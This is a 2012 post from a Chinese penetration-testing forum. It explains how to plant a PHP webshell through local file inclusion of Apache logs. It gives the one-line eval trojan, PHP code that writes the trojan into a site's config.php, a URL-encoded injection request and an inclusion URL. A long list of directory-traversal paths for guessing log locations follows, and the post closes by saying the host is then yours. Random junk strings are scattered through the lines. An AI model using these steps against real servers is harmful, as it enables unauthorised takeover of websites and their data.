中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]

作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
% f) D5 g: q+ z# V. ]* o, c& ?1 B" y3 r1 C
比如还是这句一句话木马
5 z1 m3 l" C) r& c) J# I<?eval($_POST[cmd]);?>   
( y" ?' ^5 J+ a4 L/ y* n4 X) U2 U: F6 J
" j5 Y+ s: }0 \& b, d" j) i4 O到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, " M# i8 c7 T. S9 k8 n7 c) ]+ G, s: r
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 7 S, d/ p8 J- C/ j+ B5 t$ n
8 Q9 a9 {. D4 P, q& q
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
+ k) n' W9 B/ z2 o: C$ W& Nfclose($fp);?>   //在config.php里写入一句木马语句
- Y" C% l9 Z* q2 B$ K* P: s+ \" P; B1 D8 Q& Q- }1 i
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
, L& O/ n) H, `7 O转换为 7 I% n# h$ \: g6 c" {
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
' R  `' n  F: o2 lconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
5 ~- \+ `( k! n%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B $ g8 K' w1 G" a# X) W$ }8 y
fclose%28%24fp%29%3B%3F%3E
! ?% M; y7 o7 p* L" o我们提交
9 d  @$ J3 q" p2 a" ]http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
1 y1 d( u: T. u$ _# a1 }%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp / A  d' U: R" d! l6 B: }# P
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B 8 y3 e9 }. C2 E: E7 @) [! R
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
4 Z6 t* [, J! @+ F- M
" f2 \9 {2 T5 B. z$ f, G6 Q# n这样就错误日志里就记录下了这行写入webshell的代码。
. J) z8 b4 j# j% U, O4 i我们再来包含日志,提交 ; Q$ s8 B- A7 n4 k4 W7 g( y' Z
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
1 @7 K, S% f; e8 T- l( W4 q4 C$ D' M. R, N$ @' A, z6 l
这样webshell就写入成功了,config.php里就写入一句木马语句 3 |0 H* A/ h4 s& |( \
OK.
/ z" q: U& L+ [3 k# ~6 phttp://www.xxx.com/forum/config.php这个就成了我们的webshell
9 E& s1 Z6 c  ^- A+ z$ z" W直接用lanker的客户端一连,主机就是你的了。
7 o1 A5 T9 c" g4 S1 n
0 y& ]9 q( g# F% v% |6 d% L- ZPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 0 @2 i) b1 X( G3 I
7 t$ G! m' S9 D, _# _* H3 _
其他的日志路径,你可以去猜,也可以参照这里。 ' p: D) r% P; `9 X# N: m7 N
../../../../../../../../../../var/log/httpd/access_log 7 j. _6 A  \+ C  Z3 |
../../../../../../../../../../var/log/httpd/error_log
. G/ o# L1 B7 D( I; I% c( S../apache/logs/error.log 3 Z' z! z1 l4 i  ]/ u0 e
../apache/logs/access.log " P& i$ @2 q5 g3 q
../../apache/logs/error.log
' U6 s2 m9 c1 Q0 [* N( B( j( |# c../../apache/logs/access.log . |: ]; _' C7 g6 E( }
../../../apache/logs/error.log : {3 r2 n0 J9 M6 ^% }
../../../apache/logs/access.log ; J, z0 E! _4 \4 E
../../../../../../../../../../etc/httpd/logs/acces_log
. H5 G( }, _* y) q# }../../../../../../../../../../etc/httpd/logs/acces.log
) H' G( L5 }; q../../../../../../../../../../etc/httpd/logs/error_log # U/ p; l0 G% E. l
../../../../../../../../../../etc/httpd/logs/error.log 5 I; u0 a$ k7 N6 @
../../../../../../../../../../var/www/logs/access_log
& W/ C& S# B. D../../../../../../../../../../var/www/logs/access.log
' h3 I1 `+ x1 V../../../../../../../../../../usr/local/apache/logs/access_log / T" Q8 M" X2 H- n+ L
../../../../../../../../../../usr/local/apache/logs/access.log   h1 _' L& |0 Y3 q- f& M
../../../../../../../../../../var/log/apache/access_log
* ~5 J+ i: {' K' S9 g../../../../../../../../../../var/log/apache/access.log
6 [) c3 P0 D4 }../../../../../../../../../../var/log/access_log
* j! A: i7 e! Y$ k0 @+ Z../../../../../../../../../../var/www/logs/error_log ( h0 `5 l, V% e. }1 \6 X1 M
../../../../../../../../../../var/www/logs/error.log
: e0 A7 ]: g& j../../../../../../../../../../usr/local/apache/logs/error_log ( ?, [- J% z- e' S- H( r3 D: m
../../../../../../../../../../usr/local/apache/logs/error.log
) H; X% Z3 q, L7 d. A4 f4 \) e../../../../../../../../../../var/log/apache/error_log
5 J: k& W* o- e5 R, z1 ^( g../../../../../../../../../../var/log/apache/error.log 3 z0 K9 u! y1 ?5 L
../../../../../../../../../../var/log/access_log
8 u5 t* @* x# O/ H4 J/ r../../../../../../../../../../var/log/error_log 0 D5 z4 |& q9 U7 |
/var/log/httpd/access_log       8 }( ?% F3 G( j, J8 U/ ~# l
/var/log/httpd/error_log     
6 x( o) }/ ]+ L$ E& h3 ~../apache/logs/error.log     
' h3 b2 c$ ?  a( w7 f../apache/logs/access.log - _6 [' T  Q2 @' s
../../apache/logs/error.log
' D3 ^1 w& M+ A  ?0 p../../apache/logs/access.log 2 c! m7 v9 K/ [$ K9 N
../../../apache/logs/error.log
! X4 u& g; I; W1 z../../../apache/logs/access.log - @" h2 \7 C8 ^( K
/etc/httpd/logs/acces_log # k% {9 G* M: K3 t$ E
/etc/httpd/logs/acces.log
3 ?8 U" q8 y$ V: h0 Y: p; {/etc/httpd/logs/error_log + m: y( C4 K$ t5 ?" D$ M# m; i' f
/etc/httpd/logs/error.log
+ M2 }4 [: g$ x7 Z/var/www/logs/access_log 3 o) q4 `1 A$ {+ K; N  E
/var/www/logs/access.log
: b# a2 d- y9 w1 r/ {/usr/local/apache/logs/access_log + `2 R' A' F$ _& [
/usr/local/apache/logs/access.log
; R3 U* g+ k8 F; a& R; H! N/var/log/apache/access_log
4 n- U" {& t+ C1 Q/var/log/apache/access.log
! D5 T9 F6 E  M/var/log/access_log ! O* z' b* o) c: y. Q. @4 K
/var/www/logs/error_log - Z: O6 @' ~3 D" f0 R# }
/var/www/logs/error.log   b, q4 \8 V9 r
/usr/local/apache/logs/error_log
1 e8 I* b4 W- s/usr/local/apache/logs/error.log
6 c' s5 [, ~0 T9 s( e$ d# Y/var/log/apache/error_log
( Z2 T" I8 U0 n5 K  r/var/log/apache/error.log
  K) K# G# e# C* A7 z, _4 C1 Z3 ?/var/log/access_log
: j' M6 }: @2 v# Y+ `- U3 e/var/log/error_log




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2